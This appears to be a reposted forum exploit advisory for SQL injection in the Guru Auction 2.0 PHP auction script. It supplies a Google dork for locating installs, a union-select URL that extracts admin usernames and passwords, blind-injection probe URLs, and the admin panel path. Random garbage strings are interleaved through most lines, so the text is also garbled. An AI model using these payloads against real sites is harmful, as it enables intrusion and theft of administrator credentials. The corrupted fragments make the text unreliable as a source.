Guru Auction 2.0 Multiple SQL Injection Vulnerabilities/ Y C: a z2 z
0 y: M9 P- S5 m, f, m, X作者 : v3n0m F! \7 l9 T& j. j) Y! r7 t5 _
应用 : Guru Auction 2.05 l3 ^4 m! G" c1 f6 ]& Q# m: N
Price : $49
' H* |6 m( M$ [ s* f: s0 X) k/ U5 ~; uVendor : http://www.guruscript.com/
, k _ y r0 V; \5 GGoogle Dork : inurl:subcat.php?cate_id=
V1 G. y% ?: k$ z8 E" Q0 V3 j ! \5 h4 x+ ?! i( ?1 [) B, d' o
SQLi p0c:
' B2 j! e: Z8 D$ V4 n- s( Z~~~~~~~~~~6 {( ~4 {( m6 d1 |' B
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--3 u1 _1 v8 T% c/ [, P! X
3 u6 Y0 t) d1 ?
( e, K+ g# B* r! A$ R- Y/ S" S盲注 p0c:8 o! c* {3 G& r0 t1 U
~~~~~~~~~~2 k/ P3 o* m$ |; q" `2 f
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
8 E9 {2 `/ N1 |' dhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false3 C% p% K/ k% w% C4 k6 ` r0 k0 b
+ K0 B: _& C2 g
管理登录入口:
! _8 u/ i+ K$ X" v/ J- [7 u~~~~~~~~~~
9 }5 p0 Y# Q; y$ b* D! ?http://domain.tld/[path]/admin/
1 X3 o: s, V: d |
发表于 2012-12-31 09:24:05
收藏
支持
反对